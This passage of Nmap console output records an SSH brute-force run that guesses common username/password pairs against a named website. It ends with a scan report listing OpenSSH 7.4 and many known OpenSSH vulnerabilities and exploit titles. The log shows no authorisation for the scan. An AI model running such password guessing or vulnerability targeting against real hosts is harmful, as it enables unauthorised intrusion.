2028NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2029NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2030NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2031NSE: [ssh-brute] Trying username/password pair: user:iloveu
2032NSE: [ssh-brute] Trying username/password pair: web:iloveu
2033NSE: [ssh-brute] Trying username/password pair: test:iloveu
2034NSE: [ssh-brute] Trying username/password pair: root:michelle
2035NSE: [ssh-brute] Trying username/password pair: admin:michelle
2036NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2037NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2038NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2039NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2040NSE: [ssh-brute] Trying username/password pair: guest:michelle
2041NSE: [ssh-brute] Trying username/password pair: user:michelle
2042NSE: [ssh-brute] Trying username/password pair: web:michelle
2043NSE: [ssh-brute] Trying username/password pair: test:michelle
2044NSE: [ssh-brute] Trying username/password pair: root:tigger
2045NSE: [ssh-brute] Trying username/password pair: admin:tigger
2046NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2047NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2048NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2049NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2050NSE: [ssh-brute] Trying username/password pair: guest:tigger
2051NSE: [ssh-brute] Trying username/password pair: user:tigger
2052NSE: [ssh-brute] Trying username/password pair: web:tigger
2053NSE: [ssh-brute] Trying username/password pair: test:tigger
2054NSE: [ssh-brute] Trying username/password pair: root:sunshine
2055NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2056NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2057NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2058NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2059NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2060NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2061NSE: [ssh-brute] Trying username/password pair: user:sunshine
2062NSE: [ssh-brute] Trying username/password pair: web:sunshine
2063NSE: [ssh-brute] Trying username/password pair: test:sunshine
2064NSE: [ssh-brute] Trying username/password pair: root:chocolate
2065NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2066NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2067NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2068NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2069NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2070NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2071NSE: [ssh-brute] Trying username/password pair: user:chocolate
2072NSE: [ssh-brute] Trying username/password pair: web:chocolate
2073NSE: [ssh-brute] Trying username/password pair: test:chocolate
2074NSE: [ssh-brute] Trying username/password pair: root:password1
2075NSE: [ssh-brute] Trying username/password pair: admin:password1
2076NSE: [ssh-brute] Trying username/password pair: administrator:password1
2077NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2078NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2079NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2080NSE: [ssh-brute] Trying username/password pair: guest:password1
2081NSE: [ssh-brute] Trying username/password pair: user:password1
2082NSE: [ssh-brute] Trying username/password pair: web:password1
2083NSE: [ssh-brute] Trying username/password pair: test:password1
2084NSE: [ssh-brute] Trying username/password pair: root:soccer
2085NSE: [ssh-brute] Trying username/password pair: admin:soccer
2086NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2087NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2088NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2089NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2090NSE: [ssh-brute] Trying username/password pair: guest:soccer
2091NSE: [ssh-brute] Trying username/password pair: user:soccer
2092NSE: [ssh-brute] Trying username/password pair: web:soccer
2093NSE: [ssh-brute] Trying username/password pair: test:soccer
2094NSE: [ssh-brute] Trying username/password pair: root:anthony
2095NSE: [ssh-brute] Trying username/password pair: admin:anthony
2096NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2097NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2098NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2099NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2100NSE: [ssh-brute] Trying username/password pair: guest:anthony
2101NSE: [ssh-brute] Trying username/password pair: user:anthony
2102NSE: [ssh-brute] Trying username/password pair: web:anthony
2103NSE: [ssh-brute] Trying username/password pair: test:anthony
2104NSE: [ssh-brute] Trying username/password pair: root:friends
2105NSE: [ssh-brute] Trying username/password pair: admin:friends
2106NSE: [ssh-brute] Trying username/password pair: administrator:friends
2107NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2108NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2109NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2110NSE: [ssh-brute] Trying username/password pair: guest:friends
2111NSE: [ssh-brute] Trying username/password pair: user:friends
2112NSE: [ssh-brute] Trying username/password pair: web:friends
2113NSE: [ssh-brute] Trying username/password pair: test:friends
2114NSE: [ssh-brute] Trying username/password pair: root:purple
2115NSE: [ssh-brute] Trying username/password pair: admin:purple
2116NSE: [ssh-brute] Trying username/password pair: administrator:purple
2117NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2118NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2119NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2120NSE: [ssh-brute] Trying username/password pair: guest:purple
2121NSE: [ssh-brute] Trying username/password pair: user:purple
2122NSE: [ssh-brute] Trying username/password pair: web:purple
2123NSE: [ssh-brute] Trying username/password pair: test:purple
2124NSE: [ssh-brute] Trying username/password pair: root:angel
2125NSE: [ssh-brute] Trying username/password pair: admin:angel
2126NSE: [ssh-brute] Trying username/password pair: administrator:angel
2127NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2128NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2129NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2130NSE: [ssh-brute] Trying username/password pair: guest:angel
2131NSE: [ssh-brute] Trying username/password pair: user:angel
2132NSE: [ssh-brute] Trying username/password pair: web:angel
2133NSE: [ssh-brute] Trying username/password pair: test:angel
2134NSE: [ssh-brute] Trying username/password pair: root:butterfly
2135NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2136NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2137NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2138NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2139NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2140NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2141NSE: [ssh-brute] Trying username/password pair: user:butterfly
2142NSE: [ssh-brute] Trying username/password pair: web:butterfly
2143NSE: [ssh-brute] Trying username/password pair: test:butterfly
2144NSE: [ssh-brute] Trying username/password pair: root:jordan
2145NSE: [ssh-brute] Trying username/password pair: admin:jordan
2146NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2147NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2148NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2149NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2150NSE: [ssh-brute] Trying username/password pair: guest:jordan
2151NSE: [ssh-brute] Trying username/password pair: user:jordan
2152NSE: [ssh-brute] Trying username/password pair: web:jordan
2153NSE: [ssh-brute] Trying username/password pair: test:jordan
2154NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2155NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2156NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2157NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2158NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2159NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2160NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2161NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2162NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2163NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2164NSE: [ssh-brute] Trying username/password pair: root:123123
2165NSE: [ssh-brute] Trying username/password pair: admin:123123
2166NSE: [ssh-brute] Trying username/password pair: administrator:123123
2167NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2168NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2169NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2170NSE: [ssh-brute] Trying username/password pair: guest:123123
2171Nmap scan report for idolblog.tv (89.248.174.131)
2172Host is up (0.24s latency).
2173
2174PORT STATE SERVICE VERSION
217522/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2176| ssh-auth-methods:
2177| Supported authentication methods:
2178| publickey
2179| gssapi-keyex
2180| gssapi-with-mic
2181|_ password
2182| ssh-brute:
2183| Accounts: No valid accounts found
2184|_ Statistics: Performed 377 guesses in 181 seconds, average tps: 2.3
2185| ssh-hostkey:
2186| 2048 98:fd:8f:41:eb:fc:bd:34:58:73:ce:99:5d:71:81:bc (RSA)
2187| 256 0b:57:56:f3:00:4e:9e:3d:1a:f7:a7:03:2e:5a:7e:c3 (ECDSA)
2188|_ 256 bf:16:cf:23:b6:e2:4c:45:35:8f:9e:18:34:38:07:74 (ED25519)
2189|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
2190|_ssh-run: Failed to specify credentials and command to run.
2191| vulners:
2192| cpe:/a:openbsd:openssh:7.4:
2193| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
2194|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
2195| vulscan: VulDB - https://vuldb.com:
2196| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
2197| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
2198| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
2199| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
2200| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
2201| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
2202| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
2203| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
2204| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
2205| [94611] OpenSSH up to 7.3 Access Control privilege escalation
2206| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
2207| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
2208| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
2209| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
2210| [90405] OpenSSH up to 7.2p2 sshd information disclosure
2211| [90404] OpenSSH up to 7.2p2 sshd information disclosure
2212| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
2213| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
2214| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
2215| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
2216| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
2217|
2218| MITRE CVE - https://cve.mitre.org:
2219| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
2220| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
2221|
2222| SecurityFocus - https://www.securityfocus.com/bid/:
2223| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
2224| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
2225| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
2226| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
2227| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
2228| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
2229| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
2230| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
2231| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
2232| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
2233| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
2234| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
2235| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
2236| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
2237| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
2238| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
2239| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
2240| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
2241| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
2242| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
2243| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
2244| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
2245| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
2246| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
2247| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
2248| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
2249| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
2250| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
2251| [75990] OpenSSH Login Handling Security Bypass Weakness
2252| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
2253| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
2254| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
2255| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
2256| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
2257| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
2258| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
2259| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
2260| [61286] OpenSSH Remote Denial of Service Vulnerability
2261| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
2262| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
2263| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
2264| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
2265| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
2266| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
2267| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
2268| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
2269| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
2270| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
2271| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
2272| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
2273| [30794] Red Hat OpenSSH Backdoor Vulnerability
2274| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
2275| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
2276| [28531] OpenSSH ForceCommand Command Execution Weakness
2277| [28444] OpenSSH X Connections Session Hijacking Vulnerability
2278| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
2279| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
2280| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
2281| [20956] OpenSSH Privilege Separation Key Signature Weakness
2282| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
2283| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
2284| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
2285| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
2286| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
2287| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
2288| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
2289| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
2290| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
2291| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
2292| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
2293| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
2294| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
2295| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
2296| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
2297| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
2298| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
2299| [6168] OpenSSH Visible Password Vulnerability
2300| [5374] OpenSSH Trojan Horse Vulnerability
2301| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
2302| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
2303| [4241] OpenSSH Channel Code Off-By-One Vulnerability
2304| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
2305| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
2306| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
2307| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
2308| [2917] OpenSSH PAM Session Evasion Vulnerability
2309| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
2310| [2356] OpenSSH Private Key Authentication Check Vulnerability
2311| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
2312| [1334] OpenSSH UseLogin Vulnerability
2313|
2314| IBM X-Force - https://exchange.xforce.ibmcloud.com:
2315| [83258] GSI-OpenSSH auth-pam.c security bypass
2316| [82781] OpenSSH time limit denial of service
2317| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
2318| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
2319| [72756] Debian openssh-server commands information disclosure
2320| [68339] OpenSSH pam_thread buffer overflow
2321| [67264] OpenSSH ssh-keysign unauthorized access
2322| [65910] OpenSSH remote_glob function denial of service
2323| [65163] OpenSSH certificate information disclosure
2324| [64387] OpenSSH J-PAKE security bypass
2325| [63337] Cisco Unified Videoconferencing OpenSSH weak security
2326| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
2327| [45202] OpenSSH signal handler denial of service
2328| [44747] RHEL OpenSSH backdoor
2329| [44280] OpenSSH PermitRootLogin information disclosure
2330| [44279] OpenSSH sshd weak security
2331| [44037] OpenSSH sshd SELinux role unauthorized access
2332| [43940] OpenSSH X11 forwarding information disclosure
2333| [41549] OpenSSH ForceCommand directive security bypass
2334| [41438] OpenSSH sshd session hijacking
2335| [40897] OpenSSH known_hosts weak security
2336| [40587] OpenSSH username weak security
2337| [37371] OpenSSH username data manipulation
2338| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
2339| [37112] RHSA update for OpenSSH signal handler race condition not installed
2340| [37107] RHSA update for OpenSSH identical block denial of service not installed
2341| [36637] OpenSSH X11 cookie privilege escalation
2342| [35167] OpenSSH packet.c newkeys[mode] denial of service
2343| [34490] OpenSSH OPIE information disclosure
2344| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
2345| [32975] Apple Mac OS X OpenSSH denial of service
2346| [32387] RHSA-2006:0738 updates for openssh not installed
2347| [32359] RHSA-2006:0697 updates for openssh not installed
2348| [32230] RHSA-2006:0298 updates for openssh not installed
2349| [32132] RHSA-2006:0044 updates for openssh not installed
2350| [30120] OpenSSH privilege separation monitor authentication verification weakness
2351| [29255] OpenSSH GSSAPI user enumeration
2352| [29254] OpenSSH signal handler race condition
2353| [29158] OpenSSH identical block denial of service
2354| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
2355| [25116] OpenSSH OpenPAM denial of service
2356| [24305] OpenSSH SCP shell expansion command execution
2357| [22665] RHSA-2005:106 updates for openssh not installed
2358| [22117] OpenSSH GSSAPI allows elevated privileges
2359| [22115] OpenSSH GatewayPorts security bypass
2360| [20930] OpenSSH sshd.c LoginGraceTime denial of service
2361| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
2362| [17213] OpenSSH allows port bouncing attacks
2363| [16323] OpenSSH scp file overwrite
2364| [13797] OpenSSH PAM information leak
2365| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
2366| [13264] OpenSSH PAM code could allow an attacker to gain access
2367| [13215] OpenSSH buffer management errors could allow an attacker to execute code
2368| [13214] OpenSSH memory vulnerabilities
2369| [13191] OpenSSH large packet buffer overflow
2370| [12196] OpenSSH could allow an attacker to bypass login restrictions
2371| [11970] OpenSSH could allow an attacker to obtain valid administrative account
2372| [11902] OpenSSH PAM support enabled information leak
2373| [9803] OpenSSH "
2374| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
2375| [9307] OpenSSH is running on the system
2376| [9169] OpenSSH "
2377| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
2378| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
2379| [8383] OpenSSH off-by-one error in channel code
2380| [7647] OpenSSH UseLogin option arbitrary code execution
2381| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
2382| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
2383| [7179] OpenSSH source IP access control bypass
2384| [6757] OpenSSH "
2385| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
2386| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
2387| [5517] OpenSSH allows unauthorized access to resources
2388| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
2389|
2390| Exploit-DB - https://www.exploit-db.com:
2391| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
2392| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
2393| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
2394| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
2395| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
2396| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
2397| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
2398| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
2399| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
2400| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2401| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2402| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
2403| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
2404| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
2405|
2406| OpenVAS (Nessus) - http://www.openvas.org:
2407| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
2408| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
2409| [881183] CentOS Update for openssh CESA-2012:0884 centos6
2410| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
2411| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
2412| [870763] RedHat Update for openssh RHSA-2012:0884-04
2413| [870129] RedHat Update for openssh RHSA-2008:0855-01
2414| [861813] Fedora Update for openssh FEDORA-2010-5429
2415| [861319] Fedora Update for openssh FEDORA-2007-395
2416| [861170] Fedora Update for openssh FEDORA-2007-394
2417| [861012] Fedora Update for openssh FEDORA-2007-715
2418| [840345] Ubuntu Update for openssh vulnerability USN-597-1
2419| [840300] Ubuntu Update for openssh update USN-612-5
2420| [840271] Ubuntu Update for openssh vulnerability USN-612-2
2421| [840268] Ubuntu Update for openssh update USN-612-7
2422| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
2423| [840214] Ubuntu Update for openssh vulnerability USN-566-1
2424| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
2425| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
2426| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
2427| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
2428| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
2429| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
2430| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
2431| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
2432| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
2433| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
2434| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
2435| [100584] OpenSSH X Connections Session Hijacking Vulnerability
2436| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
2437| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
2438| [65987] SLES10: Security update for OpenSSH
2439| [65819] SLES10: Security update for OpenSSH
2440| [65514] SLES9: Security update for OpenSSH
2441| [65513] SLES9: Security update for OpenSSH
2442| [65334] SLES9: Security update for OpenSSH
2443| [65248] SLES9: Security update for OpenSSH
2444| [65218] SLES9: Security update for OpenSSH
2445| [65169] SLES9: Security update for openssh,openssh-askpass
2446| [65126] SLES9: Security update for OpenSSH
2447| [65019] SLES9: Security update for OpenSSH
2448| [65015] SLES9: Security update for OpenSSH
2449| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
2450| [61639] Debian Security Advisory DSA 1638-1 (openssh)
2451| [61030] Debian Security Advisory DSA 1576-2 (openssh)
2452| [61029] Debian Security Advisory DSA 1576-1 (openssh)
2453| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
2454| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
2455| [60667] Slackware Advisory SSA:2008-095-01 openssh
2456| [59014] Slackware Advisory SSA:2007-255-01 openssh
2457| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
2458| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
2459| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
2460| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
2461| [57492] Slackware Advisory SSA:2006-272-02 openssh
2462| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
2463| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
2464| [57470] FreeBSD Ports: openssh
2465| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
2466| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
2467| [56294] Slackware Advisory SSA:2006-045-06 openssh
2468| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
2469| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
2470| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
2471| [53788] Debian Security Advisory DSA 025-1 (openssh)
2472| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
2473| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
2474| [11343] OpenSSH Client Unauthorized Remote Forwarding
2475| [10954] OpenSSH AFS/Kerberos ticket/token passing
2476| [10883] OpenSSH Channel Code Off by 1
2477| [10823] OpenSSH UseLogin Environment Variables
2478|
2479| SecurityTracker - https://www.securitytracker.com:
2480| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
2481| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
2482| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
2483| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
2484| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
2485| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
2486| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
2487| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
2488| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
2489| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
